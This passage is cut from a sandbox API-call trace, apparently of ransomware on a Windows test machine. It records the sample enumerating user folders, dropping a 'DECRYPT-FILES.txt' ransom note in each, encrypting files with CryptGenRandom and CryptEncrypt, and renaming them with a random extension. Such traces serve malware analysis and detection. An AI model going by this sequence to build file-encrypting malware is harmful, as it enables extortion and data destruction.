dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0088.327] WriteFile (in: hFile=0x434, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2e92c, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2e92c*=0x23fc, lpOverlapped=0x0) returned 1 [0088.327] CloseHandle (hObject=0x434) returned 1 [0088.328] lstrlenW (lpString="C:\\Users\\Default\\Contacts\\") returned 26 [0088.328] lstrcatW (in: lpString1="C:\\Users\\Default\\Contacts\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\Contacts\\*") returned="C:\\Users\\Default\\Contacts\\*" [0088.328] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Contacts\\*", lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb0d873a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0d873a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8b98 [0088.328] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0088.328] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb0d873a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0d873a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0088.328] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0088.328] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0088.328] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf0fefd94, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x10b1e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Administrator.contact", cAlternateFileName="ADMINI~1.CON")) returned 1 [0088.328] lstrcpyW (in: lpString1=0x3f2e920, lpString2="C:\\Users\\Default\\Contacts\\" | out: lpString1="C:\\Users\\Default\\Contacts\\") returned="C:\\Users\\Default\\Contacts\\" [0088.328] lstrcatW (in: lpString1="C:\\Users\\Default\\Contacts\\", lpString2="Administrator.contact" | out: lpString1="C:\\Users\\Default\\Contacts\\Administrator.contact") returned="C:\\Users\\Default\\Contacts\\Administrator.contact" [0088.328] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0088.328] CreateFileW (lpFileName="C:\\Users\\Default\\Contacts\\Administrator.contact" (normalized: "c:\\users\\default\\contacts\\administrator.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x410 [0088.329] GetFileSizeEx (in: hFile=0x410, lpFileSize=0x3f2e0e8 | out: lpFileSize=0x3f2e0e8*=68382) returned 1 [0088.329] CreateFileMappingW (hFile=0x410, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x414 [0088.329] MapViewOfFile (hFileMappingObject=0x414, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0088.330] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0088.330] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0088.330] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0088.331] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfc0000*, pdwDataLen=0x3f2e050*=0x28, dwBufLen=0x100 | out: pbData=0xfc0000*, pdwDataLen=0x3f2e050*=0x100) returned 1 [0088.331] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0088.334] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.334] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0088.335] CloseHandle (hObject=0x414) returned 1 [0088.335] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.335] WriteFile (in: hFile=0x410, lpBuffer=0xfc0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2e070, lpOverlapped=0x0 | out: lpBuffer=0xfc0000*, lpNumberOfBytesWritten=0x3f2e070*=0x108, lpOverlapped=0x0) returned 1 [0088.336] CloseHandle (hObject=0x0) returned 0 [0088.336] CloseHandle (hObject=0x410) returned 1 [0088.336] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.336] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.336] GetTickCount () returned 0x114e85c [0088.336] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0088.337] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0088.337] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0088.337] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0088.337] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0088.337] lstrlenW (lpString="C:\\Users\\Default\\Contacts\\Administrator.contact") returned 47 [0088.337] wsprintfW (in: param_1=0x3f2e120, param_2="%s.%s" | out: param_1="C:\\Users\\Default\\Contacts\\Administrator.contact.iSwY") returned 52 [0088.337] MoveFileExW (lpExistingFileName="C:\\Users\\Default\\Contacts\\Administrator.contact" (normalized: "c:\\users\\default\\contacts\\administrator.contact"), lpNewFileName="C:\\Users\\Default\\Contacts\\Administrator.contact.iSwY" (normalized: "c:\\users\\default\\contacts\\administrator.contact.iswy"), dwFlags=0x0) returned 1 [0088.338] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.338] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.338] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.338] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0d873a0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb0d873a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0d873a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0088.339] lstrcpyW (in: lpString1=0x3f2e920, lpString2="C:\\Users\\Default\\Contacts\\" | out: lpString1="C:\\Users\\Default\\Contacts\\") returned="C:\\Users\\Default\\Contacts\\" [0088.339] lstrcatW (in: lpString1="C:\\Users\\Default\\Contacts\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\Default\\Contacts\\jkbimi8.tmp") returned="C:\\Users\\Default\\Contacts\\jkbimi8.tmp" [0088.339] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0088.339] CreateFileW (lpFileName="C:\\Users\\Default\\Contacts\\jkbimi8.tmp" (normalized: "c:\\users\\default\\contacts\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0088.339] CloseHandle (hObject=0x0) returned 0 [0088.339] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.339] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0d873a0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb0d873a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0d873a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 0 [0088.339] FindClose (in: hFindFile=0x5f8b98 | out: hFindFile=0x5f8b98) returned 1 [0088.339] CloseHandle (hObject=0x430) returned 1 [0088.340] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x306dce32, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x306dce32, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x306dce32, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Cookies", cAlternateFileName="")) returned 1 [0088.340] lstrcmpW (lpString1="Cookies", lpString2=".") returned 1 [0088.340] lstrcmpW (lpString1="Cookies", lpString2="..") returned 1 [0088.340] lstrcatW (in: lpString1="Cookies", lpString2="\\" | out: lpString1="Cookies\\") returned="Cookies\\" [0088.340] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="Cookies\\" | out: lpString1="C:\\Users\\Default\\Cookies\\") returned="C:\\Users\\Default\\Cookies\\" [0088.340] wsprintfW (in: param_1=0x3f2e930, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\Cookies\\\\jkbimi8.tmp") returned 37 [0088.340] CreateFileW (lpFileName="C:\\Users\\Default\\Cookies\\\\jkbimi8.tmp" (normalized: "c:\\users\\default\\cookies\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x430 [0088.340] lstrlenW (lpString="C:\\Users\\Default\\Cookies\\") returned 25 [0088.340] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0088.340] wsprintfW (in: param_1=0x3f2e930, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\Cookies\\\\DECRYPT-FILES.txt") returned 43 [0088.340] CreateFileW (lpFileName="C:\\Users\\Default\\Cookies\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\cookies\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0088.340] lstrlenW (lpString="C:\\Users\\Default\\Cookies\\") returned 25 [0088.340] lstrcatW (in: lpString1="C:\\Users\\Default\\Cookies\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\Cookies\\*") returned="C:\\Users\\Default\\Cookies\\*" [0088.340] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Cookies\\*", lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0d873a0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb0d873a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0d873a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="苟盅꬈썮ϲ")) returned 0xffffffff [0088.341] CloseHandle (hObject=0x430) returned 1 [0088.341] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb09cf140, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb09cf140, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb09cf140, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0088.341] lstrcatW (in: lpString1="Desktop", lpString2="\\" | out: lpString1="Desktop\\") returned="Desktop\\" [0088.341] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="Desktop\\" | out: lpString1="C:\\Users\\Default\\Desktop\\") returned="C:\\Users\\Default\\Desktop\\" [0088.341] wsprintfW (in: param_1=0x3f2e930, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\Desktop\\\\jkbimi8.tmp") returned 37 [0088.341] CreateFileW (lpFileName="C:\\Users\\Default\\Desktop\\\\jkbimi8.tmp" (normalized: "c:\\users\\default\\desktop\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x430 [0088.341] lstrlenW (lpString="C:\\Users\\Default\\Desktop\\") returned 25 [0088.341] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0088.341] wsprintfW (in: param_1=0x3f2e930, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\Desktop\\\\DECRYPT-FILES.txt") returned 43 [0088.341] CreateFileW (lpFileName="C:\\Users\\Default\\Desktop\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\desktop\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0088.342] WriteFile (in: hFile=0x434, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2e92c, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2e92c*=0x23fc, lpOverlapped=0x0) returned 1 [0088.343] CloseHandle (hObject=0x434) returned 1 [0088.343] lstrlenW (lpString="C:\\Users\\Default\\Desktop\\") returned 25 [0088.343] lstrcatW (in: lpString1="C:\\Users\\Default\\Desktop\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\Desktop\\*") returned="C:\\Users\\Default\\Desktop\\*" [0088.343] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Desktop\\*", lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda4e0ba, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0dad500, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0dad500, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8b98 [0088.343] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0088.343] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda4e0ba, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0dad500, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0dad500, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0088.343] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0088.343] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0088.343] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0dad500, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb0dad500, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0dad500, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0088.343] lstrcpyW (in: lpString1=0x3f2e920, lpString2="C:\\Users\\Default\\Desktop\\" | out: lpString1="C:\\Users\\Default\\Desktop\\") returned="C:\\Users\\Default\\Desktop\\" [0088.343] lstrcatW (in: lpString1="C:\\Users\\Default\\Desktop\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\Default\\Desktop\\jkbimi8.tmp") returned="C:\\Users\\Default\\Desktop\\jkbimi8.tmp" [0088.343] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0088.343] CreateFileW (lpFileName="C:\\Users\\Default\\Desktop\\jkbimi8.tmp" (normalized: "c:\\users\\default\\desktop\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0088.344] CloseHandle (hObject=0x0) returned 0 [0088.344] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.344] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0dad500, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb0dad500, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0dad500, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 0 [0088.344] FindClose (in: hFindFile=0x5f8b98 | out: hFindFile=0x5f8b98) returned 1 [0088.344] CloseHandle (hObject=0x430) returned 1 [0088.344] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd890148c, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 1 [0088.344] lstrcmpW (lpString1="Documents", lpString2=".") returned 1 [0088.344] lstrcmpW (lpString1="Documents", lpString2="..") returned 1 [0088.344] lstrcatW (in: lpString1="Documents", lpString2="\\" | out: lpString1="Documents\\") returned="Documents\\" [0088.344] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="Documents\\" | out: lpString1="C:\\Users\\Default\\Documents\\") returned="C:\\Users\\Default\\Documents\\" [0088.344] wsprintfW (in: param_1=0x3f2e930, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\Documents\\\\jkbimi8.tmp") returned 39 [0088.344] CreateFileW (lpFileName="C:\\Users\\Default\\Documents\\\\jkbimi8.tmp" (normalized: "c:\\users\\default\\documents\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x430 [0088.345] lstrlenW (lpString="C:\\Users\\Default\\Documents\\") returned 27 [0088.345] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0088.345] wsprintfW (in: param_1=0x3f2e930, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\Documents\\\\DECRYPT-FILES.txt") returned 45 [0088.345] CreateFileW (lpFileName="C:\\Users\\Default\\Documents\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\documents\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0088.346] WriteFile (in: hFile=0x434, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2e92c, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2e92c*=0x23fc, lpOverlapped=0x0) returned 1 [0088.347] CloseHandle (hObject=0x434) returned 1 [0088.347] lstrlenW (lpString="C:\\Users\\Default\\Documents\\") returned 27 [0088.347] lstrcatW (in: lpString1="C:\\Users\\Default\\Documents\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\Documents\\*") returned="C:\\Users\\Default\\Documents\\*" [0088.347] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Documents\\*", lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0dad500, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0dad500, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8b98 [0088.347] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0088.347] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0dad500, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0dad500, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0088.347] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0088.347] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0088.347] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0dad500, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb0dad500, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0dad500, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0088.347] lstrcpyW (in: lpString1=0x3f2e920, lpString2="C:\\Users\\Default\\Documents\\" | out: lpString1="C:\\Users\\Default\\Documents\\") returned="C:\\Users\\Default\\Documents\\" [0088.347] lstrcatW (in: lpString1="C:\\Users\\Default\\Documents\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\Default\\Documents\\jkbimi8.tmp") returned="C:\\Users\\Default\\Documents\\jkbimi8.tmp" [0088.347] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0088.348] CreateFileW (lpFileName="C:\\Users\\Default\\Documents\\jkbimi8.tmp" (normalized: "c:\\users\\default\\documents\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0088.348] CloseHandle (hObject=0x0) returned 0 [0088.348] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.348] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x306b6cd1, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x306b6cd1, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x306b6cd1, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Music", cAlternateFileName="MYMUSI~1")) returned 1 [0088.348] lstrcmpW (lpString1="My Music", lpString2=".") returned 1 [0088.348] lstrcmpW (lpString1="My Music", lpString2="..") returned 1 [0088.348] lstrcatW (in: lpString1="My Music", lpString2="\\" | out: lpString1="My Music\\") returned="My Music\\" [0088.348] lstrcatW (in: lpString1="C:\\Users\\Default\\Documents\\", lpString2="My Music\\" | out: lpString1="C:\\Users\\Default\\Documents\\My Music\\") returned="C:\\Users\\Default\\Documents\\My Music\\" [0088.348] wsprintfW (in: param_1=0x3f2e6b4, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\Documents\\My Music\\\\jkbimi8.tmp") returned 48 [0088.348] CreateFileW (lpFileName="C:\\Users\\Default\\Documents\\My Music\\\\jkbimi8.tmp" (normalized: "c:\\users\\default\\documents\\my music\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x410 [0088.349] lstrlenW (lpString="C:\\Users\\Default\\Documents\\My Music\\") returned 36 [0088.349] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0088.349] wsprintfW (in: param_1=0x3f2e6b4, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\Documents\\My Music\\\\DECRYPT-FILES.txt") returned 54 [0088.349] CreateFileW (lpFileName="C:\\Users\\Default\\Documents\\My Music\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\documents\\my music\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x414 [0088.350] WriteFile (in: hFile=0x414, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2e6b0, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2e6b0*=0x23fc, lpOverlapped=0x0) returned 1 [0088.351] CloseHandle (hObject=0x414) returned 1 [0088.351] lstrlenW (lpString="C:\\Users\\Default\\Documents\\My Music\\") returned 36 [0088.351] lstrcatW (in: lpString1="C:\\Users\\Default\\Documents\\My Music\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\Documents\\My Music\\*") returned="C:\\Users\\Default\\Documents\\My Music\\*" [0088.351] FindFirstFileW (in: 